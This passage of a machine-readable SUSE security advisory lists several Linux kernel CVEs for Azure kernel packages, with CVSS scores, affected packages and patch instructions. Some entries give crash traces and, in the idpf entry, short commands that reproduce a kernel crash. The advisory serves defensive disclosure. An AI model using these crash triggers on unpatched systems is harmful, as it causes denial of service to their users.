}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
